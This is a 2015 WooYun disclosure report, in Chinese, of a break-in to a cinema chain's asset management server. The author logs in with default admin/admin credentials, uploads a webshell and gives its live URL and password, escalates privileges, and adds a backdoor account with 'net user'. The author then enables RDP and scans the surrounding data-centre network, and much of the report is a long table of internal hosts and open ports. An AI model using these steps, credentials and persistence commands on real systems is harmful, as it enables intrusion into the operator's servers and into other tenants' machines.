当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138204

漏洞标题:大地影院某资产管理系统存在任意文件上传漏洞最终获取服务器最高权限(可能影响同网段其他厂商业务)

相关厂商:大地影院

漏洞作者: DNS

提交时间:2015-08-31 17:47

修复时间:2015-09-05 17:48

公开时间:2015-09-05 17:48

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT,随意扫都是服务器!
电信IDC都是互联的,可以漫游全国IDC机房
大地估计是托管的吧

详细说明:

首先找到一个管理系统:大地资产管理系统
http://218.30.99.176/MyDocument/SystemPrompt.aspx
弱口令admin admin
该系统有一个任意上传!

20.png


上传拿到shell
http://218.30.99.176/Photo/Asset-20150827163855-asp.aspx admin

E:\AMS_System\AMS_Media\Photo\> ipconfig
Windows IP 配置
以太网适配器 本地连接 4:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 本地连接 3:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 本地连接 2:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::a1d1:50c9:9929:b40c%11
IPv4 地址 . . . . . . . . . . . . : 10.110.9.114
子网掩码 . . . . . . . . . . . . : 255.255.255.248
默认网关. . . . . . . . . . . . . : 10.110.9.113
隧道适配器 isatap.{92A94763-6CE9-46B1-8C83-BF2909A43E82}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{7359F97A-1086-4A10-8F7B-9FEF6237498C}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{AE88CFFE-FD32-4C84-ADB6-5BBF13249694}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{994A0041-8CAB-41E6-872E-54DE2ECAEAD5}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:c55:34f3:f591:f68d
本地链接 IPv6 地址. . . . . . . . : fe80::c55:34f3:f591:f68d%19
默认网关. . . . . . . . . . . . . : ::
E:\AMS_System\AMS_Media\Photo\> whoami
iis apppool\ams
E:\AMS_System\AMS_Media\Photo\> systeminfo
主机名: WIN-511VUL4J113
OS 名称: Microsoft Windows Server 2008 R2 Enterprise
OS 版本: 6.1.7600 暂缺 Build 7600
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00486-001-0001076-84902
初始安装日期: 2013/2/21, 10:53:37
系统启动时间: 2014/10/6, 8:12:56
系统制造商: Dell Inc.
系统型号: PowerEdge R820
系统类型: x64-based PC
处理器: 安装了 4 个处理器。
[01]: Intel64 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz
[02]: Intel64 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz
[03]: Intel64 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz
[04]: Intel64 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz
BIOS 版本: Dell Inc. 1.2.6, 2012/9/11
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 32,723 MB
可用的物理内存: 17,237 MB
虚拟内存: 最大值: 65,443 MB
虚拟内存: 可用: 48,933 MB
虚拟内存: 使用中: 16,510 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 暂缺
网卡: 安装了 4 个 NIC。
[01]: Broadcom NetXtreme Gigabit Ethernet
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 10.110.9.114
[02]: fe80::a1d1:50c9:9929:b40c
[02]: Broadcom NetXtreme Gigabit Ethernet
连接名: 本地连接 2
状态: 媒体连接已中断
[03]: Broadcom NetXtreme Gigabit Ethernet
连接名: 本地连接 3
状态: 媒体连接已中断
[04]: Broadcom NetXtreme Gigabit Ethernet
连接名: 本地连接 4
状态: 媒体连接已中断


根据信息为2008 的系统,存在本地溢出提权
net user debug a123456789A. /add

22.png


直接开了3389

222.png


上去看了半天没啥,也没有域
拿工具随意扫了几下,啥都没有
找了很久一无所获,就在和某大神扯淡的时候随意点,又扫了一次,这次随意网段都是服务器
扫到一些H3C的交换机
一般在idc 一个机架最上面或者下面是交换机也叫接入交换机
下面是服务器,一般8台
交换机
服务器
服务器
服务器
服务器
这样的架构
其实这时候我还不确定进了IDC机房
无意查看了IP
北京市 静安中心骨干机房 电信
这时候我怀疑了
经过半天的对比 我发现内网存在的网站在外网同网段也存在
下面看图

1.png


2.png


3.png


4.png


5.png

6.png


7.png


8.png


9.png


IDC/IPS备案系统!!!!!!!!
重复上面看,这不是巧合,这就是机房!!!
突然还找到一个IDC备份的系统,那么确定这是IDC机房

11.png


漏洞证明:

下面是扫的部分网段
<code>
IP-address;"Port";"Status";"Authorization";"Server name / Realm name / Device type";"BSSID";"ESSID";"Security";"Key";"WPS Pin";"LAN";"WAN"
10.110.9.25;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.35;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.46;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.48;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.65;"80";"Done";"";"Apache/2.2.22 (Unix) DAV/2 proxy_html/3.1.2 PHP/5.1.6";"";"";"";"";"";"";""
10.110.9.66;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.67;"80";"Done";"";"Apache/2.2.22 (Unix) DAV/2 proxy_html/3.1.2 PHP/5.1.6";"";"";"";"";"";"";""
10.110.9.89;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.89;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.89;"8888";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.89;"8010";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.114;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.9.114;"8080";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.9.114;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.122;"3306";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.9.123;"80";"Done";"";"nginx/1.4.0";"";"";"";"";"";"";""
10.110.9.162;"80";"Done";"";"ews/1.1.0";"";"";"";"";"";"";""
10.110.9.163;"80";"Done";"";"ews/1.1.0";"";"";"";"";"";"";""
10.110.9.164;"80";"Done";"";"ews/1.1.0";"";"";"";"";"";"";""
10.110.9.165;"80";"Done";"";"ews/1.1.0";"";"";"";"";"";"";""
10.110.9.166;"80";"Done";"";"Jetty(8.1.12.v20130726)";"";"";"";"";"";"";""
10.110.9.166;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.167;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.168;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.169;"80";"Done";"";"ews/1.1.0";"";"";"";"";"";"";""
10.110.9.170;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.171;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.172;"80";"Done";"";"ews/1.1.0";"";"";"";"";"";"";""
10.110.9.178;"80";"Done";"";"Microsoft-IIS/6.0";"";"";"";"";"";"";""
10.110.9.181;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.9.181;"8080";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.9.181;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.182;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.182;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.183;"80";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.9.183;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.183;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.9.188;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.195;"21";"Checking HNAP...";"";"Unknown";"";"";"";"";"";"";""
10.110.9.242;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.242;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.242;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.9.243;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.243;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.9.243;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.76;"21";"Timed out";"";"Unknown";"";"";"";"";"";"";""
10.110.10.82;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.10.82;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.82;"21";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.83;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.10.83;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.83;"21";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.90;"80";"Done";"";"xampp user";"";"";"";"";"";"";""
10.110.10.90;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.10.90;"443";"Done";"";"Apache/2.4.9 (Win32) OpenSSL/1.0.1g PHP/5.5.11";"";"";"";"";"";"";""
10.110.10.130;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.10.130;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.10.130;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.131;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.10.131;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.10.131;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.132;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.163;"80";"Done";"";"nginx/1.5.8";"";"";"";"";"";"";""
10.110.10.163;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.164;"80";"Done";"";"nginx/1.5.7";"";"";"";"";"";"";""
10.110.10.194;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.195;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.196;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.197;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.198;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.199;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.200;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.201;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.202;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.203;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.203;"443";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.204;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.205;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.206;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.207;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.208;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.209;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.210;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.211;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.212;"80";"Done";"";"nginx/1.2.6";"";"";"";"";"";"";""
10.110.10.246;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.10.246;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.11.99;"80";"Done";"";"Apache/2.2.15 (CentOS)";"";"";"";"";"";"";""
10.110.11.99;"443";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.11.106;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.11.106;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.11.106;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.11.106;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.11.107;"80";"Done";"";"Serv-U/14.0.0.6";"";"";"";"";"";"";""
10.110.11.107;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.11.107;"21";"Timed out";"";"Unknown";"";"";"";"";"";"";""
10.110.11.107;"443";"Done";"";"Serv-U/14.0.0.6";"";"";"";"";"";"";""
10.110.11.108;"80";"Done";"";"Apache/2.2.15 (CentOS)";"";"";"";"";"";"";""
10.110.12.28;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.12.29;"80";"Done";"";"nginx/1.6.2";"";"";"";"";"";"";""
10.110.12.29;"8080";"Done";"";"Apache/2.2.16 (Unix) PHP/5.2.14";"";"";"";"";"";"";""
10.110.12.29;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.29;"8888";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.29;"8010";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.34;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.35;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.46;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.46;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.50;"80";"Done";"";"nginx";"";"";"";"";"";"";""
10.110.12.50;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.58;"80";"Done";"";"Apache/2.2.13 (Win32) PHP/5.2.11";"";"";"";"";"";"";""
10.110.12.58;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.58;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.90;"80";"Done";"";"nginx/1.4.4";"";"";"";"";"";"";""
10.110.12.90;"9080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.90;"443";"Done";"";"nginx/1.4.4";"";"";"";"";"";"";""
10.110.12.91;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.94;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.94;"9080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.106;"80";"Done";"";"Apache/2.0.65 (Unix) PHP/5.5.14 mod_jk/1.2.40";"";"";"";"";"";"";""
10.110.12.106;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.106;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.114;"80";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.12.114;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.114;"8888";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.12.114;"443";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.12.115;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.115;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.115;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.122;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.122;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.123;"80";"Done";"";"nginx/1.4.4";"";"";"";"";"";"";""
10.110.12.123;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.123;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.12.124;"80";"Done";"";"nginx/1.4.3";"";"";"";"";"";"";""
10.110.12.124;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.124;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.12.125;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.125;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.125;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.12.130;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.12.130;"21";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.130;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.131;"80";"Done";"";"Microsoft-IIS/8.0";"";"";"";"";"";"";""
10.110.12.131;"8080";"Done";"";"Microsoft-IIS/8.0";"";"";"";"";"";"";""
10.110.12.131;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.131;"21";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.131;"8011";"Done";"";"Microsoft-IIS/8.0";"";"";"";"";"";"";""
10.110.12.131;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.132;"80";"Done";"";"Microsoft-IIS/8.0";"";"";"";"";"";"";""
10.110.12.132;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.132;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.133;"80";"Done";"";"Microsoft-IIS/8.0";"";"";"";"";"";"";""
10.110.12.133;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.133;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.133;"21";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.134;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.12.134;"21";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.134;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.138;"80";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.12.138;"8080";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.12.139;"80";"Done";"";"nginx/1.4.1 (Ubuntu)";"";"";"";"";"";"";""
10.110.12.139;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.139;"8888";"Done";"";"nginx/1.4.1 (Ubuntu)";"";"";"";"";"";"";""
10.110.12.140;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.141;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.142;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.146;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.12.146;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.12.147;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.12.149;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.12.152;"80";"Done";"";"Apache/2.2.15 (Red Hat)";"";"";"";"";"";"";""
10.110.12.210;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.12.210;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.227;"80";"Done";"";"Apache";"";"";"";"";"";"";""
10.110.12.227;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.244;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.12.244;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.12.244;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.13.17;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.13.18;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.13.37;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.14.2;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.14.3;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.14.3;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.14.8;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.14.10;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.14.10;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.14.11;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.14.12;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.14.12;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.15.1;"21";"Timed out";"";"Unknown";"";"";"";"";"";"";""
10.110.15.2;"21";"Timed out";"";"Unknown";"";"";"";"";"";"";""
10.110.15.65;"80";"Done";"";"Apache/2.2.15 (Unix) DAV/2 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5";"";"";"";"";"";"";""
10.110.15.65;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.15.65;"21";"Checking HNAP...";"";"Unknown";"";"";"";"";"";"";""
10.110.15.65;"443";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.15.66;"80";"Done";"";"Apache";"";"";"";"";"";"";""
10.110.15.66;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.15.66;"7001";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.15.67;"21";"Checking HNAP...";"";"Unknown";"";"";"";"";"";"";""
10.110.15.67;"8010";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.15.69;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.15.69;"8888";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.15.70;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.15.71;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.15.71;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.15.71;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.15.71;"443";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.4;"8080";"Done";"";"Microsoft-IIS/5.1";"";"";"";"";"";"";""
10.110.16.4;"6001";"Timed out";"";"";"";"";"";"";"";"";""
10.110.16.5;"8080";"Done";"";"Microsoft-IIS/5.1";"";"";"";"";"";"";""
10.110.16.5;"6001";"Timed out";"";"";"";"";"";"";"";"";""
10.110.16.7;"8080";"Done";"";"Microsoft-IIS/5.1";"";"";"";"";"";"";""
10.110.16.7;"6001";"Timed out";"";"";"";"";"";"";"";"";""
10.110.16.8;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.9;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.10;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.11;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.12;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.13;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.14;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.15;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.18;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.19;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.22;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.23;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.24;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.25;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.28;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.29;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.35;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.40;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.74;"80";"Done";"";"Apache/2.2.15 (Red Hat)";"";"";"";"";"";"";""
10.110.16.76;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.76;"21";"Checking HNAP...";"";"Unknown";"";"";"";"";"";"";""
10.110.16.77;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.77;"21";"HTTP -1";"";"Unknown";"";"";"";"";"";"";""
10.110.16.77;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.82;"21";"Checking HNAP...";"";"Unknown";"";"";"";"";"";"";""
10.110.16.125;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.131;"80";"Done";"";"Microsoft-IIS/7.0";"";"";"";"";"";"";""
10.110.16.132;"80";"Done";"";"Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31";"";"";"";"";"";"";""
10.110.16.132;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.133;"80";"Done";"";"Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31";"";"";"";"";"";"";""
10.110.16.134;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.134;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.134;"443";"Timed out";"";"";"";"";"";"";"";"";""
10.110.16.138;"80";"Done";"";"Please enter your ID and password";"";"";"";"";"";"";""
10.110.16.138;"443";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.139;"80";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.142;"80";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.142;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.142;"1433";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.142;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.143;"80";"Done";"";"Apache/2.4.12 (Win64) mod_jk/1.2.40";"";"";"";"";"";"";""
10.110.16.143;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.143;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.144;"80";"Done";"";"Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17";"";"";"";"";"";"";""
10.110.16.145;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.16.145;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.146;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.16.146;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.148;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.16.149;"80";"Done";"";"Microsoft-IIS/7.0";"";"";"";"";"";"";""
10.110.16.186;"80";"Done";"";"Microsoft-HTTPAPI/2.0";"";"";"";"";"";"";""
10.110.16.186;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.186;"21";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.16.226;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.16.226;"21";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.16.227;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.16.228;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.16.228;"21";"Timed out";"";"";"";"";"";"";"";"";""
10.110.16.229;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.16.242;"80";"Done";"";"Apache/2.2.15 (Red Hat)";"";"";"";"";"";"";""
10.110.16.242;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.16.243;"8080";"Done";"";"TDTWS";"";"";"";"";"";"";""
10.110.17.155;"88";"Can't load main page";"";"";"";"";"";"";"";"";""
